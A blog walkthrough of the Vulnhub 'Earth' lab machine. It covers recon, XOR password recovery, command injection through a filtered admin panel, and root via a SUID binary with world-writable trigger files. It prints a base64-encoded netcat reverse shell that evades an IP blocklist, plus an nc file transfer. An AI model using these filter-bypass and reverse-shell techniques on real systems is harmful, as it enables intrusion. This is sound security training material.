Vulnhub: Earth – CTF

Hello Cyberman!

How are you? I hope you are well. The subject of this article is the machine called Earth from the Vulnhub machine list.

This CTF is a good one: I learned a lot while solving it, for example how to use ltrace.
If you are ready, let's start!

As always, I started by scanning the local network. I use Netdiscover, which finds hosts by ARP, so it also sees machines that don't answer ICMP.

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.1.0/16
 Currently scanning: 192.168.18.0/16   |   Screen View: Unique Hosts 
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.213   				        1      60  VMware, Inc.

As shown above, the target's IP address is 192.168.1.213. Next I scanned it with Nmap to learn more about the services it runs.

┌──(kali㉿kali)-[~]
└─$ sudo nmap 192.168.1.213 -Pn -A -sV
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-28 13:28 EST
Nmap scan report for earth.local (192.168.1.213)
Host is up (0.00026s latency).
Not shown: 985 filtered tcp ports (no-response), 12 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_  256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-title: Earth Secure Messaging
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:37:15:02 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms earth.local (192.168.1.213)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.97 seconds

The certificate's Subject Alternative Name field lists two hostnames for this machine: earth.local and terratest.earth.local. Apache serves name-based virtual hosts, so which site you get depends on the Host header your browser sends. Browsing to 192.168.1.213 by IP in Firefox, Chrome or any other browser therefore does not show the intended site, and the two names only exist on the target's local network, so they don't resolve from Kali yet.

So I needed to map those names to the IP in the hosts file on Kali Linux. (If you are not familiar with the hosts file, see: https://en.wikipedia.org/wiki/Hosts_(file))

I opened the hosts file for editing with the command below.

┌──(kali㉿kali)-[~]
└─$ sudo pluma /etc/hosts

I edited it with the Pluma editor; if you don't have Pluma, any text editor will do (Pluma is a simple graphical editor, similar in spirit to Notepad++).

127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
192.168.1.213 earth.local terratest.earth.local

The last line is the one I added: the target IP followed by both hostnames. After that, opening earth.local in Firefox loaded the website.

Next I scanned the site with Nikto. (If you don't know Nikto, see: https://www.kali.org/tools/nikto/)

┌──(kali㉿kali)-[~]
└─$ nikto -h http://earth.local/  
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.213
+ Target Hostname:    earth.local
+ Target Port:        80
+ Start Time:         2022-11-28 13:34:33 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
+ Cookie csrftoken created without the httponly flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8594 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-11-28 13:34:59 (GMT-5) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Of these findings the one worth following up is /admin/; the enabled TRACE method and the cookie without the HttpOnly flag are hygiene issues that don't help here. Next I ran a directory brute-force with Dirb. (If you don't know Dirb, see: https://www.kali.org/tools/dirb/)

┌──(kali㉿kali)-[~/Desktop/earth]
└─$ dirb https://earth.local/         

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov 28 13:38:51 2022
URL_BASE: https://earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://earth.local/ ----
+ https://earth.local/admin (CODE:301|SIZE:0)                                                                                                                        
+ https://earth.local/cgi-bin/ (CODE:403|SIZE:199)                                                                                                                   
                                                                                                                                                                     
-----------------
END_TIME: Mon Nov 28 13:38:55 2022
DOWNLOADED: 4612 - FOUND: 2

So the site has an admin panel, which is promising. Against its login form I tried:

  • SQL injection
  • Brute force

Neither worked.

Then I remembered that the certificate listed two hostnames and I had only scanned earth.local. Next up: terratest.earth.local.

Note: this virtual host is served over HTTPS on port 443, so use https:// in the URL; over plain http:// you won't see these results.

┌──(kali㉿kali)-[~/Desktop/earth]
└─$ dirb https://terratest.earth.local/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov 28 13:40:02 2022
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)                                                                                                         
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)                                                                                                        
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)                                                                                                       
                                                                                                                                                                     
-----------------
END_TIME: Mon Nov 28 13:40:05 2022
DOWNLOADED: 4612 - FOUND: 3

That found something useful. I opened robots.txt in Firefox.

robots.txt lists a file named /testingnotes.* (with the extension wildcarded). It exists as /testingnotes.txt, which I opened next.

The notes gave me several clues:

  • The algorithm, in the note's own words: “Using XOR encryption as the algorithm, should be safe as used in RSA.” In reality a repeating-key XOR is nothing like RSA: anyone who knows or can guess the plaintext gets the key back by XORing the two, and even without known plaintext a repeating key falls to frequency analysis.
  • So the hex value has to be XORed with the key; no RSA is involved.
  • The username for the admin panel: terra.
  • The key is in testdata.txt.

First I opened testdata.txt.

testdata.txt holds the other half of the XOR. My brother and I worked on this step together, and we used an online tool to do the XOR.

The testingnotes.txt file also says that the user entered their own password to test the encryption algorithm.

So XORing the ciphertext at the bottom with the text of testdata.txt should give us that password.

The ciphertext to crack (hex):

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

The tool is CyberChef: https://cyberchef.org/

I won't explain CyberChef in full, but briefly: pick the operations from the list on the left (the ciphertext is hex, so it has to be converted from hex before the XOR), set their options in the middle pane, and paste the input on the right; the output appears below it.

I used the text of testdata.txt as the XOR key. Because XOR is symmetric, ciphertext XOR testdata.txt gives back the key stream, which is the password repeated over and over to the length of the text, so the password reads straight out of the output.

The password for user terra: earthclimatechangebad4humans
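The same XOR step in code, as an added Python example (not the author's CyberChef recipe and not anything from the Earth machine). The sample text and password below are constructed for the demonstration; on the real target the inputs are the hex blob above as the ciphertext and the bytes of testdata.txt as the known plaintext:

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key as often as needed.

    This is the whole "encryption algorithm" from testingnotes.txt. XOR is its own
    inverse, so the same function encrypts, decrypts and, given a plaintext and
    the ciphertext made from it, yields the key stream.
    """
    if not key:
        raise ValueError("empty key")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def shortest_period(stream: bytes) -> bytes:
    """Shortest prefix whose repetition reproduces stream (last copy may be partial).

    A repeating-key XOR leaks exactly this: the recovered key stream is the
    password written out over and over.
    """
    for n in range(1, len(stream) + 1):
        unit = stream[:n]
        if (unit * (len(stream) // n + 1))[: len(stream)] == stream:
            return unit
    return stream


def recover_key(ciphertext_hex: str, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: ciphertext XOR plaintext = key stream, collapsed
    to its repeating unit. If the known plaintext is shorter than the password,
    only a prefix of the password comes back."""
    ciphertext = bytes.fromhex(ciphertext_hex)
    n = min(len(ciphertext), len(known_plaintext))
    keystream = xor_bytes(ciphertext[:n], known_plaintext[:n])
    return shortest_period(keystream)


# Constructed sample, NOT the machine's real password or testdata.txt: a stand-in
# document encrypted the way the notes describe, so the attack can run offline.
SAMPLE_PASSWORD = b"not-the-real-password"
SAMPLE_TESTDATA = (
    b"Constructed stand-in for testdata.txt: a block of ordinary prose long "
    b"enough that the repeating key wraps around several times."
)
SAMPLE_CIPHERTEXT_HEX = xor_bytes(SAMPLE_TESTDATA, SAMPLE_PASSWORD).hex()


if __name__ == "__main__":
    # On the real box: ciphertext_hex is the hex blob from the page and
    # known_plaintext is open("testdata.txt", "rb").read().
    recovered = recover_key(SAMPLE_CIPHERTEXT_HEX, SAMPLE_TESTDATA)
    print(recovered.decode())  # not-the-real-password
    assert xor_bytes(bytes.fromhex(SAMPLE_CIPHERTEXT_HEX), recovered) == SAMPLE_TESTDATA
```

Because the key repeats, the key stream collapses to the password even when the plaintext is many times longer than it. Without testdata.txt the scheme would still fall: a repeating-key XOR over English text can be broken by guessing the key length from Hamming distances between ciphertext blocks and then doing single-byte frequency analysis per key position.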

I logged into the admin panel with these credentials.

Excellent! The admin panel turns out to be a command runner: whatever you type into its form is executed on the server.
For example, entering ls lists files and directories, just as on any Unix system.

But the input is filtered. I tried to open a reverse shell back to Kali with nc, and it did not work, because the server rejects commands that contain my IP address. For example, I tried: “nc 9002 -e sh”

So I tried a different approach. A URL such as https://www.s4msecurity.com was accepted by the filter, so my plan was to find a reverse-shell script on GitHub, download it on the target with wget (if you don't know wget, see: https://en.wikipedia.org/wiki/Wget) and run it. That didn't work either; no shell came back.

Then I searched Google for how to run base64-encoded text in a terminal, and found a great site that I now use whenever I need a reverse-shell one-liner; it lists all of them.

Website: https://www.revshells.com/

With that I prepared my payload:

echo bmMgMTkyLjE2OC4xLjEzOCA5MDAxIC1lIC9iaW4vYmFzaA== | base64 -d | sh 

The base64 string decodes to nc 192.168.1.138 9001 -e /bin/bash, a reverse shell back to my Kali machine. The filter looks for my IP address in the submitted command, but all it sees is the base64 text, which contains no dotted-quad address, so the payload passes.
echo prints the base64 string.
base64 -d decodes it.
sh reads the decoded command from the pipe and executes it.
The general lesson: a blocklist applied to a string that is then handed to a shell can always be bypassed by encoding; the only real fix is to never pass user input to a shell.
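To see why the filter fails and what the fix looks like, here is an added Python example. It is not the Earth panel's code but an assumed reconstruction of a blocklist with the behaviour the page observed (it rejects dotted-quad IP addresses); the names naive_filter_allows, hardened_filter_allows and build_argv and the allow-list contents are chosen for this example:

```python
import base64
import re

# Assumed reconstruction of the panel's filter as observed on the page, not its
# real code: refuse any command containing a dotted-quad IPv4 address.
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Tokens that would chain or redirect commands if they ever reached a shell.
SHELL_METACHARS = {"|", "||", "&&", ";", "&", ">", ">>", "<"}


def naive_filter_allows(command: str) -> bool:
    """The blocklist as the author ran into it: a string match on the raw input."""
    return IPV4.search(command) is None


def smuggle(command: str) -> str:
    """Wrap a blocked command the way the page's payload does: the shell that
    finally runs it sees the decoded text, the filter only ever saw base64."""
    encoded = base64.b64encode(command.encode()).decode()
    return f"echo {encoded} | base64 -d | sh"


def decode_base64_tokens(command: str) -> list:
    """Defender's view: every whitespace-separated token that is valid base64
    for printable text. Words like 'echo' or 'sh' and flags like '-d' either
    fail strict validation or decode to non-text and are skipped."""
    found = []
    for token in command.split():
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if text.isprintable():
            found.append(text)
    return found


def hardened_filter_allows(command: str) -> bool:
    """Re-run the blocklist on anything smuggled in as base64. This closes the
    one trick on the page, but not hex, rot13, $IFS games or a curl to a
    hostname: a blocklist in front of a shell is never complete."""
    if not naive_filter_allows(command):
        return False
    return all(naive_filter_allows(text) for text in decode_base64_tokens(command))


def build_argv(command: str, allowed=("ls", "id", "whoami", "uptime")) -> list:
    """The actual fix: never hand user input to a shell. Split it into an argv
    for subprocess.run(argv, shell=False), permit only allow-listed programs and
    reject shell metacharacters (with shell=False they would only be literal
    arguments, but an allow-listed program might still interpret them)."""
    argv = command.split()
    if not argv or argv[0] not in allowed:
        raise PermissionError(f"command not allowed: {argv[:1]}")
    if any(tok in SHELL_METACHARS for tok in argv):
        raise PermissionError("shell metacharacters are not allowed")
    return argv


if __name__ == "__main__":
    payload = smuggle("nc 192.168.1.138 9001 -e /bin/bash")
    print(payload)
    print("naive filter allows payload:", naive_filter_allows(payload))  # True
    print("hardened filter allows payload:", hardened_filter_allows(payload))  # False
    print("argv for 'ls -la':", build_argv("ls -la"))
```

Run it and the first line printed is exactly the payload from the page. hardened_filter_allows shows that even a filter which decodes base64 only buys time; build_argv is the shape of a real fix, where the user never gets to compose a shell command at all.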

In other words, the target echoes my base64 text, decodes it and runs the result. With nc listening on port 9001 on Kali, a shell came back. Now let's go for root!

First I checked for SUID binaries, which run with the privileges of the file's owner (usually root) no matter who executes them. If you don't know SUID, see: https://rootrecipe.medium.com/suid-binaries-27c724ef753c

I used find on the target.

$ find / -perm -u=s 2>/dev/null

The list included an unusual binary, /usr/bin/reset_root, which is not part of a standard install and is the one to look at.
(The 2>/dev/null at the end discards the permission-denied errors that find prints for directories a normal user can't read, so only the matches remain.)

Next I looked at the printable strings in reset_root with the strings command, run on the target:

$ strings /usr/bin/reset_root

I read through the whole strings output.

The strings suggest that the binary resets the root password when some trigger files are present, but not which files. To find out I wanted to copy the binary to my own machine and run it under ltrace, which prints the library calls a program makes (puts(), access() and so on) together with their arguments and return values. Note that ltrace traces library calls; strace is the tool for system calls.

First, on Kali (the attacking machine), I started an nc listener that writes whatever it receives into a file named reset_root:

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 9002 > reset_root

Then, on the target, I pushed the binary into that listener with nc, connecting to my Kali address on port 9002 with /usr/bin/reset_root as standard input. (The copy arrives without the execute bit, so chmod +x it before running it.)

Then I ran the copy under ltrace. If you don't know ltrace, see: https://blog.packagecloud.io/how-does-ltrace-work/

┌──(kali㉿kali)-[~]
└─$ ltrace ./reset_root                                                                                                                           
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                                                            = 38
access("/dev/shm/kHgTFI5G", 0)                                                                         = -1
access("/dev/shm/Zw7bV9U5", 0)                                                                         = -1
access("/tmp/kcM0Wewe", 0)                                                                             = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                                                            = 44
+++ exited (status 0) +++

That reveals the three trigger files the binary tests with access(): two under /dev/shm and one under /tmp. Both directories are world-writable, and that is the real bug: a SUID-root program takes its go/no-go decision from files that any local user can create.
So I created the three files on the target (touch is enough; access(path, 0) is an F_OK existence check, so the files can be empty).
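Pulling the trigger paths out of ltrace output can be automated. The following is an added Python example (not the author's code), fed with the ltrace lines from above with the padding condensed. The WORLD_WRITABLE_DIRS list is a static assumption about a stock Linux layout, not something checked on the box:

```python
import re
import shlex

# The ltrace run from above, as printed (column padding shortened).
LTRACE_OUTPUT = """\
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                                      = 38
access("/dev/shm/kHgTFI5G", 0)         = -1
access("/dev/shm/Zw7bV9U5", 0)         = -1
access("/tmp/kcM0Wewe", 0)             = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                                      = 44
+++ exited (status 0) +++
"""

# Library calls whose first argument is a path and which return -1 when it is absent.
FILE_CHECK = re.compile(
    r'^(?P<func>access|stat|lstat|open)\("(?P<path>[^"]+)"[^=]*=\s*(?P<ret>-?\d+)'
)

# Assumed world-writable directories on a stock install (heuristic only; on a
# live box confirm with `ls -ld`).
WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def missing_files(ltrace_output: str) -> list:
    """Paths the traced program probed and did not find, in probe order, deduplicated."""
    paths = []
    for line in ltrace_output.splitlines():
        m = FILE_CHECK.match(line.strip())
        if m and int(m.group("ret")) < 0 and m.group("path") not in paths:
            paths.append(m.group("path"))
    return paths


def in_world_writable_dir(path: str) -> bool:
    """True if an unprivileged user could create this path, which is what makes
    a trigger file under /tmp or /dev/shm a privilege-escalation bug."""
    return any(path.startswith(d + "/") for d in WORLD_WRITABLE_DIRS)


def touch_command(paths: list) -> str:
    """One command line to create the triggers. access(path, 0) is F_OK, a pure
    existence check, so empty files satisfy it."""
    return "touch " + " ".join(shlex.quote(p) for p in paths)


if __name__ == "__main__":
    triggers = missing_files(LTRACE_OUTPUT)
    for p in triggers:
        note = "world-writable dir" if in_world_writable_dir(p) else "check permissions"
        print(f"{p}  [{note}]")
    print(touch_command(triggers))
```

On a real engagement pipe `ltrace -f ./binary 2>&1` into this instead of the embedded text; the same regex catches stat() and open() probes, which is where SUID programs usually hide a similar mistake.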

Finally, I ran /usr/bin/reset_root again on the target.

This time the reset succeeded and the root password was changed. The new root password is: Earth. 🙂

With the username and password known, I switched to root with su on the target.

Now I am root! Excellent! The last step is to read root_flag.txt. 🙂

What this CTF taught me:

I hope you learned something too.

Have a nice day, full of informatics. 🙂

13 Comments

  1. I may need your help. I tried many ways but couldn’t solve it, but after reading your article, I think you have a way to help me. I’m looking forward for your reply. Thanks.

  2. A psychologist (from Ancient Greek ψυχή, soul; λόγος, knowledge) is a specialist
    who studies the manifestations, methods and forms of organisation of the mental phenomena of the personality in various areas of human activity, in order to solve research and applied
    problems, and also to provide psychological help, support and guidance.

  3. Wow, this blog is really cool! 🚀 The content is energetic and motivating. 🌟 I always find something new and interesting here. 👏 Keep up the spirit of sharing knowledge! 🤩💯 This article is stunning! 🌈 Thank you for the source of inspiration! 🙌✨ #SemangatTinggi #Edukatif #SangatSuka

  4. Your article is excellent! The information is presented clearly, and I’m curious if you plan to add more images in your upcoming pieces. It could enhance the overall reader experience.

  5. Terrific article! 👌 The insights are well-articulated, and I’m curious if you plan to include more images in your upcoming pieces. It could enhance the overall reader experience. 🎨

  6. Truly extraordinary! The quality of this content is very special. The way it is presented is very impressive. The dedication and knowledge in this work really shine through. Kudos to the author for the very valuable experience provided. I am enthusiastically waiting to see more content like this in the future. 👏👏👏
